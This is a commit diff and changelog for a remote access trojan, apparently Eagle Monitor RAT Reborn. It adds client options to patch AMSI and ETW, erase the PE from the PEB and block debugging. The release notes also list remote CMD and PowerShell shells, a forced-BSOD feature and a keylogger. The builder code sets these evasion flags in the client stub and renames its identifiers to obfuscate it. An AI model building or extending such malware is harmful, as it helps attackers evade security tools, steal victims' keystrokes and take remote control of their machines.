3.2.3.0

* [New][Client] Patch AMSI
* [New][Client] Patch ETW
* [New][Client] Erase PE from PEB
* [New][Client] Anti-Debug
* [Tweaks] Added 'Optimize' attribute for csc compiler
* [New] Added Remote CMD
* [New] Added Remote Powershell
* [Fix] BSOD was not working (wrong status code)
* [Fix] Null reference with keylogger socket

Author: arsium

Remote Access Tool/C2/C2.csproj

@@ -30,6 +30,7 @@
     <DefineConstants>TRACE</DefineConstants>
     <ErrorReport>prompt</ErrorReport>
     <WarningLevel>4</WarningLevel>
+    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
   </PropertyGroup>
   <ItemGroup>
     <None Include="App.config" />

Remote Access Tool/C2/client.cs

@@ -29,6 +29,10 @@ public static class Config
         public static string mutex = "%MUTEX%";
         public static Offline.Persistence.Method installationMethod = Offline.Persistence.Method.NONE;
         public static string[] installationParam = new string[] { AppDomain.CurrentDomain.FriendlyName };
+        public static bool blockETW = false;
+        public static bool blockAMSI = false;
+        public static bool erasePEFromPEB = false;
+        public static bool antiDBG = false;
     }
     public class StarterClass
     {
@@ -111,6 +115,7 @@ internal static void StartOfflineKeylogger()
         [MTAThread]
         public static void Main()
         {
+            Offline.Special.Parser.Parse(Config.blockAMSI, Config.blockETW, Config.erasePEFromPEB, Config.antiDBG);
             MakeInstall();
             OneInstance();
 

Remote Access Tool/C2/obj/Release/C2.csproj.AssemblyReference.cache

@@ -1 +1 @@
-cda5eb7bc6e232f33e621e1a1a38483d03ae39f6
+105dcd742de8ee0e0a6fddc63b452b7228bc3b02

Remote Access Tool/C2/obj/Release/C2.csproj.CoreCompileInputs.cache

@@ -5,8 +5,6 @@
 using System.Text;
 using System.Windows.Forms;
 using dnlib.DotNet;
-using Eagle_Monitor_RAT_Reborn.Controls;
-using static Eagle_Monitor_RAT_Reborn.Network.ClientHandler;
 
 /* 
 || AUTHOR Arsium ||
@@ -56,18 +54,54 @@ internal static bool BuildClient()
                 if (Program.mainForm.offKeyloguna2CheckBox.Checked)
                 {
                     LogStep("Setting offline keylogger..." + Environment.NewLine);
-                    stub = stub.Replace("static bool offKeylog = false;", "static bool offKeylog = true;");
+                    stub = stub.Replace("bool offKeylog = false;", "bool offKeylog = true;");
                 }
                 else
                     LogStep("Skipping offline keylogger..." + Environment.NewLine);
 
+
+                if (Program.mainForm.patchETWGuna2CheckBox.Checked)
+                {
+                    LogStep("Setting etw patch..." + Environment.NewLine);
+                    stub = stub.Replace("bool blockETW = false;", "bool blockETW = true;");
+                }
+                else
+                    LogStep("Skipping etw patch..." + Environment.NewLine);
+
+
+                if (Program.mainForm.patchAMSIGuna2CheckBox.Checked)
+                {
+                    LogStep("Setting amsi patch..." + Environment.NewLine);
+                    stub = stub.Replace("bool blockAMSI = false;", "bool blockAMSI = true;");
+                }
+                else
+                    LogStep("Skipping amsi patch..." + Environment.NewLine);
+
+
+                if (Program.mainForm.erasePEHeadersGuna2CheckBox.Checked)
+                {
+                    LogStep("Setting PE headers eraser..." + Environment.NewLine);
+                    stub = stub.Replace("bool erasePEFromPEB = false;", "bool erasePEFromPEB = true;");
+                }
+                else
+                    LogStep("Skipping PE headers eraser..." + Environment.NewLine);
+
+
+                if (Program.mainForm.antiDebugGuna2CheckBox.Checked)
+                {
+                    LogStep("Setting anti-debug..." + Environment.NewLine);
+                    stub = stub.Replace("bool antiDBG = false;", "bool antiDBG = true;");
+                }
+                else
+                    LogStep("Skipping anti-debug..." + Environment.NewLine);
+
+
                 LogStep("Renaming code..." + Environment.NewLine);
 
                 stub = Rename(stub, "hosts");
                 stub = Rename(stub, "hostLists");
                 stub = Rename(stub, "generalKey");
                 stub = Rename(stub, "Config");
-                stub = Rename(stub, "offKeylog");
                 stub = Rename(stub, "installationParam");
                 stub = Rename(stub, "installationMethod");
                 stub = Rename(stub, "StarterClass");
@@ -88,7 +122,7 @@ internal static bool BuildClient()
                 stub = Rename(stub, "EndPacketRead");
                 stub = Rename(stub, "SendDataCompleted");
                 stub = Rename(stub, "EndConnect");
-
+                //
                 stub = Rename(stub, "ReadDataAsync");
                 stub = Rename(stub, "readDataAsync");
 
@@ -101,6 +135,12 @@ internal static bool BuildClient()
                 stub = Rename(stub, "SendDataAsync");
                 stub = Rename(stub, "sendDataAsync");
                 stub = Rename(stub, "SendData");
+                //
+                stub = Rename(stub, "offKeylog");
+                stub = Rename(stub, "antiDBG");
+                stub = Rename(stub, "erasePEFromPEB");
+                stub = Rename(stub, "blockAMSI");
+                stub = Rename(stub, "blockETW");
 
                 File.WriteAllText(Application.StartupPath + "\\Stubs\\clienttmp.cs", stub);